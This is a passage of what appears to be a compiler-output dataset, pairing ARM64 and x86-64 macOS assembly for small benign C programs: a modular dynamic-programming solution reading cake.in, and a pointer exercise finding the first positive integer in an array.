LBB1_52: ; in Loop: Header=BB1_43 Depth=2
b LBB1_53
LBB1_53: ; in Loop: Header=BB1_43 Depth=2
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB1_43
LBB1_54: ; in Loop: Header=BB1_41 Depth=1
b LBB1_55
LBB1_55: ; in Loop: Header=BB1_41 Depth=1
ldur w8, [x29, #-8]
add w8, w8, #1
stur w8, [x29, #-8]
b LBB1_41
LBB1_56:
b LBB1_57
LBB1_57:
ldr x9, [sp, #88] ; 8-byte Folded Reload
ldr x8, [sp, #80] ; 8-byte Folded Reload
ldursw x10, [x29, #-20]
mov x11, #2472
mul x10, x10, x11
add x8, x8, x10
ldursw x10, [x29, #-24]
ldr x8, [x8, x10, lsl #3]
stur x8, [x29, #-48]
adrp x8, _z_nb@GOTPAGE
ldr x8, [x8, _z_nb@GOTPAGEOFF]
str x8, [x9]
ldur x8, [x29, #-48]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB1_59
b LBB1_58
LBB1_58:
ldr x10, [sp, #88] ; 8-byte Folded Reload
ldr x9, [x10]
add x8, x9, #1
str x8, [x10]
mov w8, #48
strb w8, [x9, #1]
b LBB1_59
LBB1_59:
b LBB1_60
LBB1_60: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-48]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB1_62
b LBB1_61
LBB1_61: ; in Loop: Header=BB1_60 Depth=1
ldr x12, [sp, #88] ; 8-byte Folded Reload
ldur x8, [x29, #-48]
mov x9, #10
sdiv x10, x8, x9
mul x10, x10, x9
subs x8, x8, x10
add x8, x8, #48
ldr x10, [x12]
add x11, x10, #1
str x11, [x12]
; kill: def $w8 killed $w8 killed $x8
strb w8, [x10, #1]
ldur x8, [x29, #-48]
sdiv x8, x8, x9
stur x8, [x29, #-48]
b LBB1_60
LBB1_62:
b LBB1_63
LBB1_63: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #88] ; 8-byte Folded Reload
ldr x8, [x8]
adrp x9, _z_nb@GOTPAGE
ldr x9, [x9, _z_nb@GOTPAGEOFF]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB1_69
b LBB1_64
LBB1_64: ; in Loop: Header=BB1_63 Depth=1
b LBB1_65
LBB1_65: ; in Loop: Header=BB1_63 Depth=1
ldur x9, [x29, #-88] ; 8-byte Folded Reload
adrp x8, _z_op@PAGE
ldr x8, [x8, _z_op@PAGEOFF]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB1_67
b LBB1_66
LBB1_66: ; in Loop: Header=BB1_63 Depth=1
ldur x8, [x29, #-56] ; 8-byte Folded Reload
ldr x10, [sp, #96] ; 8-byte Folded Reload
adrp x9, _z_op@PAGE
str x10, [x9, _z_op@PAGEOFF]
ldr x0, [x9, _z_op@PAGEOFF]
ldr x3, [x8]
mov x1, #1
mov x2, #1024
bl _fwrite
b LBB1_67
LBB1_67: ; in Loop: Header=BB1_63 Depth=1
ldr x10, [sp, #88] ; 8-byte Folded Reload
ldr x8, [x10]
subs x9, x8, #1
str x9, [x10]
ldrb w8, [x8]
adrp x11, _z_op@PAGE
ldr x9, [x11, _z_op@PAGEOFF]
add x10, x9, #1
str x10, [x11, _z_op@PAGEOFF]
strb w8, [x9]
b LBB1_68
LBB1_68: ; in Loop: Header=BB1_63 Depth=1
b LBB1_63
LBB1_69:
b LBB1_70
LBB1_70:
ldur x9, [x29, #-88] ; 8-byte Folded Reload
adrp x8, _z_op@PAGE
ldr x8, [x8, _z_op@PAGEOFF]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB1_72
b LBB1_71
LBB1_71:
ldur x8, [x29, #-56] ; 8-byte Folded Reload
ldr x10, [sp, #96] ; 8-byte Folded Reload
adrp x9, _z_op@PAGE
str x10, [x9, _z_op@PAGEOFF]
ldr x0, [x9, _z_op@PAGEOFF]
ldr x3, [x8]
mov x1, #1
mov x2, #1024
bl _fwrite
b LBB1_72
LBB1_72:
adrp x10, _z_op@PAGE
ldr x9, [x10, _z_op@PAGEOFF]
add x8, x9, #1
str x8, [x10, _z_op@PAGEOFF]
mov w8, #10
strb w8, [x9]
b LBB1_73
LBB1_73:
b LBB1_74
LBB1_74:
mov w0, #0
ldp x29, x30, [sp, #192] ; 16-byte Folded Reload
add sp, sp, #208
ret
.cfi_endproc
; -- End function
.comm _z_ib,1024,0 ; @z_ib
.section __DATA,__data
.globl _z_ip ; @z_ip
.p2align 3
_z_ip:
.quad _z_ib+1024
.comm _z_ob,1024,0 ; @z_ob
.globl _z_op ; @z_op
.p2align 3
_z_op:
.quad _z_ob
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "cake.in"
l_.str.1: ; @.str.1
.asciz "r"
l_.str.2: ; @.str.2
.asciz "cake.out"
l_.str.3: ; @.str.3
.asciz "w"
.comm _f,763848,3 ; @f
.comm _z_nb,31,0 ; @z_nb
.comm _z_np,8,3 ; @z_np
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _z_flush ## -- Begin function z_flush
.p2align 4, 0x90
_z_flush: ## @z_flush
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq _z_op(%rip), %rsi
movq _z_ob@GOTPCREL(%rip), %rax
subq %rax, %rsi
movq ___stdoutp@GOTPCREL(%rip), %rax
movq (%rax), %rcx
movq _z_ob@GOTPCREL(%rip), %rdi
movl $1, %edx
callq _fwrite
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movl $0, -4(%rbp)
leaq _z_flush(%rip), %rdi
callq _atexit
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdx
leaq L_.str(%rip), %rdi
leaq L_.str.1(%rip), %rsi
callq _freopen
movq ___stdoutp@GOTPCREL(%rip), %rax
movq (%rax), %rdx
leaq L_.str.2(%rip), %rdi
leaq L_.str.3(%rip), %rsi
callq _freopen
## %bb.1:
movl $1, -28(%rbp)
LBB1_2: ## =>This Inner Loop Header: Depth=1
movq _z_ib@GOTPCREL(%rip), %rax
addq $1024, %rax ## imm = 0x400
cmpq %rax, _z_ip(%rip)
jne LBB1_4
## %bb.3: ## in Loop: Header=BB1_2 Depth=1
movq _z_ib@GOTPCREL(%rip), %rax
movq %rax, _z_ip(%rip)
movq _z_ip(%rip), %rdi
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rcx
movl $1, %esi
movl $1024, %edx ## imm = 0x400
callq _fread
movq _z_ip(%rip), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, _z_ip(%rip)
movsbl (%rax), %eax
movl %eax, -52(%rbp) ## 4-byte Spill
jmp LBB1_5
LBB1_4: ## in Loop: Header=BB1_2 Depth=1
movq _z_ip(%rip), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, _z_ip(%rip)
movsbl (%rax), %eax
movl %eax, -52(%rbp) ## 4-byte Spill
LBB1_5: ## in Loop: Header=BB1_2 Depth=1
movl -52(%rbp), %edi ## 4-byte Reload
movl %edi, -32(%rbp)
callq _isdigit
cmpl $0, %eax
setne %al
xorb $-1, %al
testb $1, %al
jne LBB1_6
jmp LBB1_9
LBB1_6: ## in Loop: Header=BB1_2 Depth=1
cmpl $45, -32(%rbp)
jne LBB1_8
## %bb.7: ## in Loop: Header=BB1_2 Depth=1
movl $-1, -28(%rbp)
LBB1_8: ## in Loop: Header=BB1_2 Depth=1
jmp LBB1_2
LBB1_9:
movl -32(%rbp), %eax
subl $48, %eax
movl %eax, -20(%rbp)
LBB1_10: ## =>This Inner Loop Header: Depth=1
movq _z_ib@GOTPCREL(%rip), %rax
addq $1024, %rax ## imm = 0x400
cmpq %rax, _z_ip(%rip)
jne LBB1_12
## %bb.11: ## in Loop: Header=BB1_10 Depth=1
movq _z_ib@GOTPCREL(%rip), %rax
movq %rax, _z_ip(%rip)
movq _z_ip(%rip), %rdi
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rcx
movl $1, %esi
movl $1024, %edx ## imm = 0x400
callq _fread
movq _z_ip(%rip), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, _z_ip(%rip)
movsbl (%rax), %eax
movl %eax, -56(%rbp) ## 4-byte Spill
jmp LBB1_13
LBB1_12: ## in Loop: Header=BB1_10 Depth=1
movq _z_ip(%rip), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, _z_ip(%rip)
movsbl (%rax), %eax
movl %eax, -56(%rbp) ## 4-byte Spill
LBB1_13: ## in Loop: Header=BB1_10 Depth=1
movl -56(%rbp), %edi ## 4-byte Reload
movl %edi, -32(%rbp)
callq _isdigit
cmpl $0, %eax
je LBB1_15
## %bb.14: ## in Loop: Header=BB1_10 Depth=1
imull $10, -20(%rbp), %eax
addl -32(%rbp), %eax
subl $48, %eax
movl %eax, -20(%rbp)
jmp LBB1_10
LBB1_15:
movl -28(%rbp), %eax
imull -20(%rbp), %eax
movl %eax, -20(%rbp)
## %bb.16:
jmp LBB1_17
LBB1_17:
movl $1, -36(%rbp)
LBB1_18: ## =>This Inner Loop Header: Depth=1
movq _z_ib@GOTPCREL(%rip), %rax
addq $1024, %rax ## imm = 0x400
cmpq %rax, _z_ip(%rip)
jne LBB1_20
## %bb.19: ## in Loop: Header=BB1_18 Depth=1
movq _z_ib@GOTPCREL(%rip), %rax
movq %rax, _z_ip(%rip)
movq _z_ip(%rip), %rdi
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rcx
movl $1, %esi
movl $1024, %edx ## imm = 0x400
callq _fread
movq _z_ip(%rip), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, _z_ip(%rip)
movsbl (%rax), %eax
movl %eax, -60(%rbp) ## 4-byte Spill
jmp LBB1_21
LBB1_20: ## in Loop: Header=BB1_18 Depth=1
movq _z_ip(%rip), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, _z_ip(%rip)
movsbl (%rax), %eax
movl %eax, -60(%rbp) ## 4-byte Spill
LBB1_21: ## in Loop: Header=BB1_18 Depth=1
movl -60(%rbp), %edi ## 4-byte Reload
movl %edi, -40(%rbp)
callq _isdigit
cmpl $0, %eax
setne %al
xorb $-1, %al
testb $1, %al
jne LBB1_22
jmp LBB1_25
LBB1_22: ## in Loop: Header=BB1_18 Depth=1
cmpl $45, -40(%rbp)
jne LBB1_24
## %bb.23: ## in Loop: Header=BB1_18 Depth=1
movl $-1, -36(%rbp)
LBB1_24: ## in Loop: Header=BB1_18 Depth=1
jmp LBB1_18
LBB1_25:
movl -40(%rbp), %eax
subl $48, %eax
movl %eax, -24(%rbp)
LBB1_26: ## =>This Inner Loop Header: Depth=1
movq _z_ib@GOTPCREL(%rip), %rax
addq $1024, %rax ## imm = 0x400
cmpq %rax, _z_ip(%rip)
jne LBB1_28
## %bb.27: ## in Loop: Header=BB1_26 Depth=1
movq _z_ib@GOTPCREL(%rip), %rax
movq %rax, _z_ip(%rip)
movq _z_ip(%rip), %rdi
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rcx
movl $1, %esi
movl $1024, %edx ## imm = 0x400
callq _fread
movq _z_ip(%rip), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, _z_ip(%rip)
movsbl (%rax), %eax
movl %eax, -64(%rbp) ## 4-byte Spill
jmp LBB1_29
LBB1_28: ## in Loop: Header=BB1_26 Depth=1
movq _z_ip(%rip), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, _z_ip(%rip)
movsbl (%rax), %eax
movl %eax, -64(%rbp) ## 4-byte Spill
LBB1_29: ## in Loop: Header=BB1_26 Depth=1
movl -64(%rbp), %edi ## 4-byte Reload
movl %edi, -40(%rbp)
callq _isdigit
cmpl $0, %eax
je LBB1_31
## %bb.30: ## in Loop: Header=BB1_26 Depth=1
imull $10, -24(%rbp), %eax
addl -40(%rbp), %eax
subl $48, %eax
movl %eax, -24(%rbp)
jmp LBB1_26
LBB1_31:
movl -36(%rbp), %eax
imull -24(%rbp), %eax
movl %eax, -24(%rbp)
## %bb.32:
movq _f@GOTPCREL(%rip), %rax
movq $1, 2480(%rax)
movl $2, -8(%rbp)
LBB1_33: ## =>This Loop Header: Depth=1
## Child Loop BB1_35 Depth 2
movl -8(%rbp), %eax
cmpl -24(%rbp), %eax
jg LBB1_40
## %bb.34: ## in Loop: Header=BB1_33 Depth=1
movl $1, -16(%rbp)
LBB1_35: ## Parent Loop BB1_33 Depth=1
## => This Inner Loop Header: Depth=2
movl -16(%rbp), %eax
cmpl -8(%rbp), %eax
jge LBB1_38
## %bb.36: ## in Loop: Header=BB1_35 Depth=2
movslq -8(%rbp), %rcx
movq _f@GOTPCREL(%rip), %rax
movq 2472(%rax,%rcx,8), %rax
movq %rax, -72(%rbp) ## 8-byte Spill
movl -8(%rbp), %eax
subl -16(%rbp), %eax
movslq %eax, %rcx
movq _f@GOTPCREL(%rip), %rax
movq 2472(%rax,%rcx,8), %rax
movslq -16(%rbp), %rdx
movq _f@GOTPCREL(%rip), %rcx
imulq 2472(%rcx,%rdx,8), %rax
movl $1000000007, %ecx ## imm = 0x3B9ACA07
cqto
idivq %rcx
movq -72(%rbp), %rax ## 8-byte Reload
addq %rdx, %rax
movl $1000000007, %ecx ## imm = 0x3B9ACA07
cqto
idivq %rcx
movslq -8(%rbp), %rcx
movq _f@GOTPCREL(%rip), %rax
movq %rdx, 2472(%rax,%rcx,8)
## %bb.37: ## in Loop: Header=BB1_35 Depth=2
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB1_35
LBB1_38: ## in Loop: Header=BB1_33 Depth=1
jmp LBB1_39
LBB1_39: ## in Loop: Header=BB1_33 Depth=1
movl -8(%rbp), %eax
addl $1, %eax
movl %eax, -8(%rbp)
jmp LBB1_33
LBB1_40:
movl $2, -8(%rbp)
LBB1_41: ## =>This Loop Header: Depth=1
## Child Loop BB1_43 Depth 2
## Child Loop BB1_45 Depth 3
## Child Loop BB1_49 Depth 3
movl -8(%rbp), %eax
cmpl -20(%rbp), %eax
jg LBB1_56
## %bb.42: ## in Loop: Header=BB1_41 Depth=1
movl $1, -12(%rbp)
LBB1_43: ## Parent Loop BB1_41 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB1_45 Depth 3
## Child Loop BB1_49 Depth 3
movl -12(%rbp), %eax
cmpl -24(%rbp), %eax
jg LBB1_54
## %bb.44: ## in Loop: Header=BB1_43 Depth=2
movl $1, -16(%rbp)
LBB1_45: ## Parent Loop BB1_41 Depth=1
## Parent Loop BB1_43 Depth=2
## => This Inner Loop Header: Depth=3
movl -16(%rbp), %eax
cmpl -8(%rbp), %eax
jge LBB1_48
## %bb.46: ## in Loop: Header=BB1_45 Depth=3
movslq -8(%rbp), %rcx
movq _f@GOTPCREL(%rip), %rax
imulq $2472, %rcx, %rcx ## imm = 0x9A8
addq %rcx, %rax
movslq -12(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movq %rax, -80(%rbp) ## 8-byte Spill
movl -8(%rbp), %eax
subl -16(%rbp), %eax
movslq %eax, %rcx
movq _f@GOTPCREL(%rip), %rax
imulq $2472, %rcx, %rcx ## imm = 0x9A8
addq %rcx, %rax
movslq -12(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movslq -16(%rbp), %rdx
movq _f@GOTPCREL(%rip), %rcx
imulq $2472, %rdx, %rdx ## imm = 0x9A8
addq %rdx, %rcx
movslq -12(%rbp), %rdx
imulq (%rcx,%rdx,8), %rax
movl $1000000007, %ecx ## imm = 0x3B9ACA07
cqto
idivq %rcx
movq -80(%rbp), %rax ## 8-byte Reload
addq %rdx, %rax
movl $1000000007, %ecx ## imm = 0x3B9ACA07
cqto
idivq %rcx
movslq -8(%rbp), %rcx
movq _f@GOTPCREL(%rip), %rax
imulq $2472, %rcx, %rcx ## imm = 0x9A8
addq %rcx, %rax
movslq -12(%rbp), %rcx
movq %rdx, (%rax,%rcx,8)
## %bb.47: ## in Loop: Header=BB1_45 Depth=3
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB1_45
LBB1_48: ## in Loop: Header=BB1_43 Depth=2
movl $1, -16(%rbp)
LBB1_49: ## Parent Loop BB1_41 Depth=1
## Parent Loop BB1_43 Depth=2
## => This Inner Loop Header: Depth=3
movl -16(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB1_52
## %bb.50: ## in Loop: Header=BB1_49 Depth=3
movslq -8(%rbp), %rcx
movq _f@GOTPCREL(%rip), %rax
imulq $2472, %rcx, %rcx ## imm = 0x9A8
addq %rcx, %rax
movslq -12(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movq %rax, -88(%rbp) ## 8-byte Spill
movslq -8(%rbp), %rcx
movq _f@GOTPCREL(%rip), %rax
imulq $2472, %rcx, %rcx ## imm = 0x9A8
addq %rcx, %rax
movl -12(%rbp), %ecx
subl -16(%rbp), %ecx
movslq %ecx, %rcx
movq (%rax,%rcx,8), %rax
movslq -8(%rbp), %rdx
movq _f@GOTPCREL(%rip), %rcx
imulq $2472, %rdx, %rdx ## imm = 0x9A8
addq %rdx, %rcx
movslq -16(%rbp), %rdx
imulq (%rcx,%rdx,8), %rax
movl $1000000007, %ecx ## imm = 0x3B9ACA07
cqto
idivq %rcx
movq -88(%rbp), %rax ## 8-byte Reload
addq %rdx, %rax
movl $1000000007, %ecx ## imm = 0x3B9ACA07
cqto
idivq %rcx
movslq -8(%rbp), %rcx
movq _f@GOTPCREL(%rip), %rax
imulq $2472, %rcx, %rcx ## imm = 0x9A8
addq %rcx, %rax
movslq -12(%rbp), %rcx
movq %rdx, (%rax,%rcx,8)
## %bb.51: ## in Loop: Header=BB1_49 Depth=3
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB1_49
LBB1_52: ## in Loop: Header=BB1_43 Depth=2
jmp LBB1_53
LBB1_53: ## in Loop: Header=BB1_43 Depth=2
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB1_43
LBB1_54: ## in Loop: Header=BB1_41 Depth=1
jmp LBB1_55
LBB1_55: ## in Loop: Header=BB1_41 Depth=1
movl -8(%rbp), %eax
addl $1, %eax
movl %eax, -8(%rbp)
jmp LBB1_41
LBB1_56:
jmp LBB1_57
LBB1_57:
movslq -20(%rbp), %rcx
movq _f@GOTPCREL(%rip), %rax
imulq $2472, %rcx, %rcx ## imm = 0x9A8
addq %rcx, %rax
movslq -24(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movq %rax, -48(%rbp)
movq _z_np@GOTPCREL(%rip), %rax
movq _z_nb@GOTPCREL(%rip), %rcx
movq %rcx, (%rax)
cmpq $0, -48(%rbp)
jne LBB1_59
## %bb.58:
movq _z_np@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, %rdx
addq $1, %rdx
movq _z_np@GOTPCREL(%rip), %rcx
movq %rdx, (%rcx)
movb $48, 1(%rax)
LBB1_59:
jmp LBB1_60
LBB1_60: ## =>This Inner Loop Header: Depth=1
cmpq $0, -48(%rbp)
je LBB1_62
## %bb.61: ## in Loop: Header=BB1_60 Depth=1
movq -48(%rbp), %rax
movl $10, %ecx
cqto
idivq %rcx
addq $48, %rdx
movb %dl, %cl
movq _z_np@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, %rsi
addq $1, %rsi
movq _z_np@GOTPCREL(%rip), %rdx
movq %rsi, (%rdx)
movb %cl, 1(%rax)
movq -48(%rbp), %rax
movl $10, %ecx
cqto
idivq %rcx
movq %rax, -48(%rbp)
jmp LBB1_60
LBB1_62:
jmp LBB1_63
LBB1_63: ## =>This Inner Loop Header: Depth=1
movq _z_nb@GOTPCREL(%rip), %rcx
movq _z_np@GOTPCREL(%rip), %rax
cmpq %rcx, (%rax)
je LBB1_69
## %bb.64: ## in Loop: Header=BB1_63 Depth=1
jmp LBB1_65
LBB1_65: ## in Loop: Header=BB1_63 Depth=1
movq _z_ob@GOTPCREL(%rip), %rax
addq $1024, %rax ## imm = 0x400
cmpq %rax, _z_op(%rip)
jne LBB1_67
## %bb.66: ## in Loop: Header=BB1_63 Depth=1
movq _z_ob@GOTPCREL(%rip), %rax
movq %rax, _z_op(%rip)
movq _z_op(%rip), %rdi
movq ___stdoutp@GOTPCREL(%rip), %rax
movq (%rax), %rcx
movl $1, %esi
movl $1024, %edx ## imm = 0x400
callq _fwrite
LBB1_67: ## in Loop: Header=BB1_63 Depth=1
movq _z_np@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, %rdx
addq $-1, %rdx
movq _z_np@GOTPCREL(%rip), %rcx
movq %rdx, (%rcx)
movb (%rax), %cl
movq _z_op(%rip), %rax
movq %rax, %rdx
addq $1, %rdx
movq %rdx, _z_op(%rip)
movb %cl, (%rax)
## %bb.68: ## in Loop: Header=BB1_63 Depth=1
jmp LBB1_63
LBB1_69:
jmp LBB1_70
LBB1_70:
movq _z_ob@GOTPCREL(%rip), %rax
addq $1024, %rax ## imm = 0x400
cmpq %rax, _z_op(%rip)
jne LBB1_72
## %bb.71:
movq _z_ob@GOTPCREL(%rip), %rax
movq %rax, _z_op(%rip)
movq _z_op(%rip), %rdi
movq ___stdoutp@GOTPCREL(%rip), %rax
movq (%rax), %rcx
movl $1, %esi
movl $1024, %edx ## imm = 0x400
callq _fwrite
LBB1_72:
movq _z_op(%rip), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, _z_op(%rip)
movb $10, (%rax)
## %bb.73:
jmp LBB1_74
LBB1_74:
xorl %eax, %eax
addq $96, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.comm _z_ib,1024,4 ## @z_ib
.section __DATA,__data
.globl _z_ip ## @z_ip
.p2align 3
_z_ip:
.quad _z_ib+1024
.comm _z_ob,1024,4 ## @z_ob
.globl _z_op ## @z_op
.p2align 3
_z_op:
.quad _z_ob
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "cake.in"
L_.str.1: ## @.str.1
.asciz "r"
L_.str.2: ## @.str.2
.asciz "cake.out"
L_.str.3: ## @.str.3
.asciz "w"
.comm _f,763848,4 ## @f
.comm _z_nb,31,4 ## @z_nb
.comm _z_np,8,3 ## @z_np
.subsections_via_symbols
| the_stack_data/612021.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _first_positive ; -- Begin function first_positive
.p2align 2
_first_positive: ; @first_positive
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #8]
ldr w8, [x8]
subs w8, w8, #0
cset w8, gt
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #8]
add x8, x8, #4
str x8, [sp, #8]
b LBB0_1
LBB0_3:
ldr x0, [sp, #8]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #128
.cfi_def_cfa_offset 128
stp x29, x30, [sp, #112] ; 16-byte Folded Spill
add x29, sp, #112
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
stur wzr, [x29, #-52]
str wzr, [sp, #56]
b LBB1_1
LBB1_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #56]
subs w8, w8, #10
cset w8, ge
tbnz w8, #0, LBB1_4
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
ldrsw x9, [sp, #56]
sub x8, x29, #48
add x8, x8, x9, lsl #2
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
b LBB1_3
LBB1_3: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #56]
add w8, w8, #1
str w8, [sp, #56]
b LBB1_1
LBB1_4:
sub x0, x29, #48
str x0, [sp, #24] ; 8-byte Folded Spill
bl _first_positive
str x0, [sp, #48]
ldr x8, [sp, #48]
ldr w9, [x8]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
str x0, [sp, #16] ; 8-byte Folded Spill
bl _printf
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldr x8, [sp, #48]
subs x8, x8, x9
mov x9, #4
str x9, [sp, #32] ; 8-byte Folded Spill
sdiv x8, x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
str x0, [sp, #40] ; 8-byte Folded Spill
bl _printf
ldr x8, [sp, #24] ; 8-byte Folded Reload
add x0, x8, #20
bl _first_positive
mov x8, x0
ldr x0, [sp, #16] ; 8-byte Folded Reload
str x8, [sp, #48]
ldr x8, [sp, #48]
ldr w9, [x8]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
bl _printf
ldr x10, [sp, #24] ; 8-byte Folded Reload
ldr x9, [sp, #32] ; 8-byte Folded Reload
ldr x0, [sp, #40] ; 8-byte Folded Reload
ldr x8, [sp, #48]
subs x8, x8, x10
sdiv x8, x8, x9
mov x9, sp
str x8, [x9]
bl _printf
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB1_6
b LBB1_5
LBB1_5:
bl ___stack_chk_fail
LBB1_6:
mov w0, #0
ldp x29, x30, [sp, #112] ; 16-byte Folded Reload
add sp, sp, #128
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d"
l_.str.1: ; @.str.1
.asciz "*iptr = %d\n"
l_.str.2: ; @.str.2
.asciz "iptr - array = %d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _first_positive ## -- Begin function first_positive
.p2align 4, 0x90
_first_positive: ## @first_positive
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movq -8(%rbp), %rax
cmpl $0, (%rax)
jg LBB0_3
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
addq $4, %rax
movq %rax, -8(%rbp)
jmp LBB0_1
LBB0_3:
movq -8(%rbp), %rax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -52(%rbp)
movl $0, -56(%rbp)
LBB1_1: ## =>This Inner Loop Header: Depth=1
cmpl $10, -56(%rbp)
jge LBB1_4
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movslq -56(%rbp), %rax
leaq -48(%rbp), %rsi
shlq $2, %rax
addq %rax, %rsi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _scanf
## %bb.3: ## in Loop: Header=BB1_1 Depth=1
movl -56(%rbp), %eax
addl $1, %eax
movl %eax, -56(%rbp)
jmp LBB1_1
LBB1_4:
leaq -48(%rbp), %rdi
callq _first_positive
movq %rax, -64(%rbp)
movq -64(%rbp), %rax
movl (%rax), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movq -64(%rbp), %rsi
leaq -48(%rbp), %rax
subq %rax, %rsi
sarq $2, %rsi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
leaq -48(%rbp), %rdi
addq $20, %rdi
callq _first_positive
movq %rax, -64(%rbp)
movq -64(%rbp), %rax
movl (%rax), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movq -64(%rbp), %rsi
leaq -48(%rbp), %rax
subq %rax, %rsi
sarq $2, %rsi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB1_6
## %bb.5:
xorl %eax, %eax
addq $64, %rsp
popq %rbp
retq
LBB1_6:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d"
L_.str.1: ## @.str.1
.asciz "*iptr = %d\n"
L_.str.2: ## @.str.2
.asciz "iptr - array = %d\n"
.subsections_via_symbols
| the_stack_data/126701730.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
